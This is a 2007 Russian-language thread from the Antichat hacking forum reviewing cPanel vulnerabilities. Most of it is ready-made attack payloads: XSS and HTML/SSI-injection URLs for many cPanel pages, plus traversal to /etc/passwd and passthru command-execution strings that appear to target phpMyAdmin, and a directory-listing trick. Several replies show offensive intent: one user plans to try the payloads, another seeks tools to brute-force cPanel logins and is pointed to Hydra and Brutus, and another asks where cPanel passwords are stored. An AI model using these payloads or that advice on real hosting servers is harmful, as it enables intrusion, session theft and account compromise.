ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор: уязвимости cPanel ]
  #1  
Старый 30.11.2007, 20:33
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
Post [ Обзор: уязвимости cPanel ]

Мой сегодняшний мини обзор уязвимостей посвящён cPanel.
Надеюсь вам будет интерестно и полезно

Exploits:

cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
exploit for Cpanel 5 remote command execution
local cPanel <= 10.8.x cpwrap root exploit via mysqladmin
BasiliX <= 1.1.1 Remote File Include Exploit
exploit for Cpanel 5 remote command execution
Multiple xxs cPanel 10


CPanel 11 Multiple Cross-Site Scription

Код:
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS 
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS 
http://target:2082/frontend/x/files/createdir.html?dir=XSS 
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss 
http://target:2082/frontend/x/err/erredit.html?dir=XSS 
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS 
http://target:2082/frontend/x/files/createfile.html?dir=XSS

Exensive cPanel Cross Site Scripting

Код:
Systems Affected: cPanel 9.1.0-R85

To check cPanel for CSS, simply access the following example URLs in a browser: 
http://[victim]/frontend/x/cpanelpro/ignorelist.
html?account="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/cpanelpro/showlog.
html?account=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/sql/repairdb.
html?db=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/ftp/doaddftp.
html?login="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/cpanelpro/editmsg.
html?account="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/testfile.
html?email=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/err/erredit.
html?dir=public_html/&file=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='s="fixed">http://www.cirt.net/'</script> 
http://[victim]/frontend/x2/denyip/del.
html?ip=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/htaccess/index.
html?dir=<script>alert('Vulnerable')</script>
References:
Updated information can be found on OSVDB.org under the following entries:
http://www.osvdb.org/4208 cPanel testfile.html email Variable XSS
http://www.osvdb.org/4209 cPanel erredit.html file Variable XSS
http://www.osvdb.org/4210 cPanel dnslook.html dns Variable XSS
http://www.osvdb.org/4211 cPanel ignorelist.html account Variable XSS
http://www.osvdb.org/4212 cPanel showlog.html account Variable XSS
http://www.osvdb.org/4213 cPanel repairdb.html db Variable XSS
http://www.osvdb.org/4214 cPanel doaddftp.html login Variable XSS
http://www.osvdb.org/4215 cPanel editmsg.html account Variable XSS
http://www.osvdb.org/4243 cPanel del.html account Variable XSS


cPanel 10.9.1 XSS

Код:
cPanel 10.9.1 XSS 

/frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERE 
(click on Go Back...)

XSS in Cpanel 10

Код:
Exploit & Examples: 

Exploit: 
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1> 

Javascript: 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');"> 

Server Side Inclusion 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" --> 

HTML 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">

cPanel Version 11 Pops.Html Cross-Site Scripting

Код:
http://target:2082/mail/pops.html?domain=XSS

cPanel Multiple Cross Site Scripting Vulnerability

Код:
Affected scripts with proof of concept exploit: 

http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.
html?email= <script>alert('vul')</script>&domain= 

http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.
html?email= <script>alert('vul')</script>&domain=xxx 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.
html?showtree=0 "><script>alert('vul')</script> 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script> 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx 

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xx
x&target=xxx 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan "><script>alert('vul')</script>&year=2006
&domain=xxx&target=xxx

CPanel 10 Multiple Cross Site Scription

Код:
CPanel file Manager: 
PoC: 
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS] 

CPanel Password Protect DIRS: 
PoC: 
http://target.com:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=A VALID FOLDER 
*Press Go Back (hyperlink) 

In Password Protected DIR: 
PoC: 
http://www.target:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=[XSS]

Major Cpanel Expliot HTML Injection

Код:
http://(domain):
2086/scripts/passwd?password=<>&domain=<>&user=<>

Последний раз редактировалось Solide Snake; 01.12.2007 в 02:47..
 
Ответить с цитированием

  #2  
Старый 30.11.2007, 21:13
Аватар для F!$T
F!$T
Участник форума
Регистрация: 05.02.2007
Сообщений: 142
Провел на форуме:
2652878

Репутация: 995
Отправить сообщение для F!$T с помощью ICQ
По умолчанию

очередной интересный обзор... что сказать +1
 
Ответить с цитированием

  #3  
Старый 04.12.2007, 21:18
Аватар для lsass.exe
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

интересно, щас затестим =\ спс
 
Ответить с цитированием

  #4  
Старый 16.12.2007, 18:25
Аватар для DEMIX
DEMIX
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892

Репутация: 11
По умолчанию

Не пойму что нам даст XSS уязвимость??? Разве что только куки.

У меня такой вопрос: я подбирал вручную логин и пароль в cPanel 11 и меня все время скидывало назад не выдавая никакой ошибки, но потом я попал на логин «бла…бла…бла» и мне выдало: «Login Attempt Failed!» – что в переводе означает «Неудавшаяся Попытка Логина!»
Когда я ввожу этот логин «бла…бла…бла» и любой пароль то мне все время выдает ету надпись. Значит ли это что я подобрал логин для cPanel???

И еще вопрос какую прогу посоветуете для подбора пароля к cPanel 11???
 
Ответить с цитированием

  #5  
Старый 16.12.2007, 18:28
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Цитата:
Не пойму что нам даст XSS уязвимость??? Разве что только куки.
А тебе этого мало?
Цитата:
подбора пароля к cPanel 11
BrutusAET2, THC Hydra
 
Ответить с цитированием

  #6  
Старый 18.12.2007, 21:51
Аватар для DEMIX
DEMIX
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892

Репутация: 11
По умолчанию

Цитата:
Сообщение от bul.666  
А тебе этого мало?
Хотелось большего.

Еще один вопрос: в каких файлах хранятся пароли от cPanel?
 
Ответить с цитированием

  #7  
Старый 18.12.2007, 22:08
Аватар для Ali_MiX
Ali_MiX
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732

Репутация: 80
Отправить сообщение для Ali_MiX с помощью ICQ Отправить сообщение для Ali_MiX с помощью Yahoo
По умолчанию

Сенкс. Кто покажет уже на примере.
 
Ответить с цитированием

  #8  
Старый 19.12.2007, 07:17
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Скажу тупо взято с баг траков и не поверенно, все уязвисости не предоставляют особой опасноти.

От меня :

Инклуды.
Код:
./tbl_replace.php?db=test&table=test&goto=/etc/hosts
./sql.php?goto=/etc/hosts&btnDrop=No
./export.php?what=../../../../../../etc/passwd%00
Поизвольное иполнение команд:
Код:
./tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
./tbl_copy.php?db=test&table=test&new_name=test.test2&strCopyTableOK="".passthru('/bin/ls')."""
Раскрытие пути.
Код:
./libraries/grab_globals.lib.php
 
Ответить с цитированием

  #9  
Старый 18.03.2008, 21:27
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

cPanel 11.x directories listing

Vulnerable: cPanel 11.x (tested on 11.18.3)

PoC:
Код:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
 
Ответить с цитированием

XSS in cPanel 11.x
  #10  
Старый 23.03.2008, 15:10
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию XSS in cPanel 11.x

XSS

Vulnerable: cPanel 11.x [tested on cPanel V 11.18.3, cPanel V 11.21.0-BETA]

PoC:
Код:
http://example.com:2082/frontend/x/manpage.html?[XSS]
© Linux_Drox
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей phpWebSite ] Scipio Сценарии/CMF/СMS 5 18.07.2008 13:53
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин E-Mail 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ